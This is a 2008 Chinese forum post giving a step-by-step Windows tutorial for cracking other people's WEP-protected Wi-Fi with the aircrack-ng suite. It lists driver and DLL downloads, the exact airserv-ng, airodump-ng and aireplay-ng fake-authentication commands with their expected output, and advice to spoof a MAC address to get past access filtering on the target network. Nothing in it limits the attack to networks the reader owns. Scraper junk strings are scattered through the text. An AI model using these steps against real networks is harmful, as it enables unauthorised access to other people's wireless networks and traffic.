上等兵
- 注册时间
- 2008-7-25
- 金币
- 63 个
- 威望
- 5 个
- 荣誉
- 0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
|
使用airrack和注射式攻击来破解WEPA首先你需要正确安装网卡驱动: 如果你的网卡不被commview支持的话,那么你需要安装wildpackets的驱动. 8 {) t' I6 [0 E4 Y
A1如果你的网卡被commview支持的话,那么点下面的地址下载驱动:* ~- K' m' a& ~8 A2 r1 G& x9 Z
http://www.tamos.com/bitrix/redirect.php?event1=download&event2=commwifi&event3=&goto=/files/ca5.zip! L* {# b' r; X
A2 如果不被commview支持的网卡则可以下载widpackets的驱动:
" {7 g6 e7 _6 D* G0 t, I: n2 Ihttp://www.wildpackets.com/support/downloads/drivers
2 _* Z* b* @3 V) q. [( L# V注意:下面的教程是在你正确安装commview的驱动的前提下进行的!
# b- g/ ]" {# oB 你需要下载这个.dll文件(只适用于commview 的网友):
, b% y- L3 ~( chttp://darkircop.org/commview.dll
, U9 G3 Y) V- ]! G
& y0 \3 L4 s% ~* \; eC 你需要下载aircrack 压缩包: http://dl.aircrack-ng.org/aircrack-ng-svn-win.zip
- n+ }" \- s! r! i/ c
1 w7 q& u' z, b3 l& `3 p7 g! eD 解压aircrack 压缩包到你的任意硬盘根目录,在这里我是解压到c盘& n& H: H0 T* K. R; s& V& R
% [3 ^& P4 J, @2 S% `
E 把B下载到的commview.dll 放到D解压的文件夹,应该放到目录c:\aircrack\8 F4 n0 ~7 b, O d2 ?- b5 V
6 O( z! o& k- R5 }2 r+ {7 B
F 去目录c:\program files\commview for wifi\(注意这个目录是安装完commview以后才会有,也就是A1你下载的文件),然后找到”ca2k.dll”文件,把”ca2k.dll”,拷贝到(c:\aircrack).
2 P; A2 N/ Y, h6 T. i
/ F' Y3 z" V/ Y" r/ D3 ^当你完成以上准备以后,就可以开始正式的破解了!
o! Q/ O F; F' \* {) i5 E( m$ r原文提供的连接无法下载4 f7 x( ` s4 h$ R% C
1 `) x+ N; }7 n, f8 P
特提供以上文件的合成包供下载- _7 n( ~1 X$ T0 l
密码:password
1 ^& Z4 o0 `8 `2 a5 ~" a5 Q2 \
* q* Q- e7 @7 {破解:
, ]7 p! a; R% }$ D7 M) \1:打开一个命令提示符 (开始 > 运行 > cmd.exe)
6 v& {) A0 J# L" r9 {2 n1 M% j0 M7 k: n9 p( E+ E
2:在命令提示符窗口下面输入:; y: S3 t% k. M% ]5 g
Cd c:\aircrack 7 }) v' L0 o! Z/ K
-按下回车
% L" |8 z* b( v0 ?9 b' c. y/ D9 _9 l6 e( E7 E
3 在命令相同的提示符窗口下面输入: . i1 ?- M8 u$ o+ {& u
airserv-ng -d commview.dll
' q" a5 C3 y) g8 z R+ H5 n-按下回车 2 P# t! I# {1 i( M9 k8 n
你看到的回复应该跟下面一样: Z* h4 \& A/ ~' X) {1 _6 J
3 N7 p) B7 F* m0 B7 G7 o
Opening card commview.dll 8 ]2 }; _3 i/ w# U" O7 ]7 v
Setting chan 1
+ \7 m( q6 c& U0 |6 C. G) GOpening sock port 666
3 S3 o! C0 P& M* l: @Serving commview.dll chan 1 on port 6664 {% l" w" m; O# P, A
) U% V, F! F0 v' i如果你没有看到上面的结果的话,而是看到下面的结果的话:
. y/ w: r2 P3 p: e9 P H! M# K4 Z2 n7 }* z
注意这里可能会有两种情况出现!!!!!:
O4 K9 K* w i0 ?2 E2 l4 S
" ?+ X. R3 t4 u! x8 ^0 r(1)$ z0 [/ G; A! j9 U P4 N
"Opening card commview.dll
z* r3 p8 e# J' P$ o1 wAdapter not found * L9 C/ t' J6 S) Z9 K8 U) ^
get_guid() 4 I9 N/ p$ [0 j. ?
airserv-ng: wi_open(): No error"
- v- _. J$ d* p) `/ u% C, z
6 j1 X. \2 p2 s' j4 w: |! Y0 x' {这种情况那么你可以试试这个命令:
' O4 a, f) m& U k' S* G4 U
' | T" s% ~) {% C5 a0 b( Eairserv-ng -d "commview.dll|debug"6 u( m, M: i9 }/ g5 h
, R4 b! s+ j- b% F然后你可能会看到下面的结果
$ R6 R/ |+ h& z5 K1 p C
$ S: |$ \, V; d5 E9 sOpening card commview.dll|debug
|% L, p; G% i$ tName: [CommView] Proxim ORiNOCO 802.11b/g ComboCard Gold 8470 . e/ v# u+ m4 o$ ^. u% b
get_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg Co
x' G9 V2 y, [mboCard Gold - Paketplaner-Miniport
' H" C. V6 `- p, GAdapter not found 8 a% z! |5 v' x* N' I
get_guid()
% `6 e( {& L& r) {airserv-ng: wi_open(): No error
* B8 ~' O4 h9 F0 W+ a
! }( r) }/ j" c8 i0 a x4 X那么你只要输入下面的命令就可以了
4 J x3 I) C, f. \; Q) `" g6 {
- p# o. T6 ^$ j# g. \airserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}"
% N1 w _0 e! Y
! q6 E/ Y- Q4 o+ E+ w- j/ P, c或者会自动搜寻网卡,然后提示你是不是这个网卡,然你远yes/no,那么你需要选择yes就可以了2 o- E+ j9 ]. s! s5 [, h$ ]6 h: k7 G
3 R+ k( ]: T0 b% m$ H" Q* V(2)
( T6 i. a6 L, f/ `"Opening card commview.dll
# ?' e# L# j9 CF1
H5 {7 S K& \) W/ Iinit_lib() & m# D( B. @" F3 j( c
airserv-ng: wi_open(): No error"
: W" i& A+ g! v* V( A/ K5 M
. ~1 |3 c5 X* E3 T% ^7 K这种情况的话,那么你应该是由于安装了,windpackets 驱动而产生的问题,那么建议你安装commview 驱动,如果可能的话.
, ^/ G9 i+ L( E; \7 f; m/ S6 I- A9 p* N
4! t- } F# S2 N V0 A7 o: O
-注意现在重新开一个新的命令提示符窗口(我叫它窗口2),不要关掉前面的那个(窗口1)!!!
- s/ D2 f$ q/ F" Z, j' {-在窗口2输入命令如下:
& e5 i+ B3 D' o5 D cd c:\aircrack\
- o* k1 i1 p# X3 [$ o按回车
) q; d) [. v' h* g
$ i2 O0 C0 i/ ^! _' n. `5( K8 B4 x1 J+ v- A. E1 S" |6 f$ R
-在窗口2输入命令如下: + L) {3 b) _0 k- ]
airodump-ng 127.0.0.1:666, |' a) y; M- m/ j9 z) w
回车; ]% n4 z/ H: w. q; B" W
! o& U* k1 X; V C- x6 e. [
提示: 如果你知道需要监视那个频道的话,那么你可以输入以下命令,我建议你这样做!!!:( q6 F2 P6 l: q8 P8 ~/ p9 y* L2 |
! K7 e+ _- U, Z n; q! M3 ~8 R3 ]airodump-ng --channel 你的频道号 127.0.0.1:666 : S7 V1 E3 {7 T3 {' O
比如说我需要监视的频道是6,那么命令如下
2 u" M+ G4 z& A4 R4 I+ Z U4 G# V+ y* {
" B M0 ]- w" a3 n5 O! J airodump-ng --channel 6 127.0.0.1:666" p8 w9 o$ Y$ X! B: d
1 T/ D3 T* _2 r8 ~0 u
好了,现在airodump-ng 现在应该已经开始截取数据了,后面我们会使用注射式攻击来提高数据包的获取速度.
: c6 v* ?. t* A Z% q6
& Z/ A: _9 {% M/ ^3 @& M* C# e+ Z现在重新开一个新的命令提示符窗口(窗口3),不要关掉前面的(窗口1)和(窗口2)!!!0 S4 L" r% `% [1 w7 X: y* N
-在窗口3输入命令如下:
# d. P5 L6 E2 b R, b cd c:\aircrack\
: C4 Z' U8 g2 x) J T& J按回车
: R% w% M" f; j; ?! P75 _5 p+ e5 t) o- Z, U% Y$ R
在窗口3输入后面的命令:2 c9 e% ~" q6 s- W0 V1 \) e% B
aireplay-ng -1 0 -e 你想破解网络的ESSID -a 你想破解网络的BSSID -h 你用来监视的网络的网卡MAC 127.0.0.1:666 M( y/ b- ^5 Z" ^
实例:( B1 ^+ X% L3 r: @) Z. P
ESSID = wifi16 ' p: h e* h' Y) S' s6 [
BSSID = 11:22:33:44:55:66
: W: K& t( B( [. \" Y3 K% a8 e( KMAC = 01:23:45:67:89:01
5 U* x- D1 ~& u% q6 ~提示:3 i/ g5 @2 m, c: I/ A
你想破解网络的ESSID = 破解网络的名字 (wifi16, mynetwork): d( o( a% R7 G
你想破解网络的BSSID = 破解网络的MAC (11:22:33:44:55:66)
. P l H0 a: i: a1 b你用来监视的网络的网卡MAC = 这个就是你的网卡MAC咯 1 n4 |/ m( l0 h0 b( @9 a0 d
那么命令行应该是:
% g# W* ?$ g3 V8 G) Z% ~$ e, S9 yaireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666
/ g# ` H/ l9 K8 R5 \' c! A如果一切正常的话那么你会得到下面的回复:
# F1 B; e" a8 r2 ^9 FSending Authentication Request
8 Q6 ]0 p7 ]- t' T8 V- }3 ]- gAuthentication successful 1 h: v8 |! g) z: [- f* I6 @+ }
Sending Association Request ) ^. R! H4 z9 l1 j- E
Association successful
7 D' W4 r' W( Z S9 G2 a如果你得到:
5 r n8 j4 w N8 y9 V5 rAP rejects the source MAC address& G1 {! V' R; v- {2 N4 ?; n
这说明你破解的网络只允许特定的MAC 访问,那你你需要把你的MAC地址改成破解网络允许的地址.% S+ I, K9 r$ F, G
如果你持续得到:
8 h! h W I) N! L6 R" ssending authentication request- n* B2 E4 R \, m
那么说明你离破解网络太远了,信号太弱,你需要离破解网络跟进一点,以获得更好的信号.% u6 E. C8 u0 @" ?, c; J' y! S
% U1 L0 k: e3 B! |; M3 ]8 V3 h[ 本帖最后由 fzulib 于 2008-9-5 16:01 编辑 ] |
评分
-
1
查看全部评分
-
|
IP卡
狗仔卡
发表于 2008-9-1 10:13
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
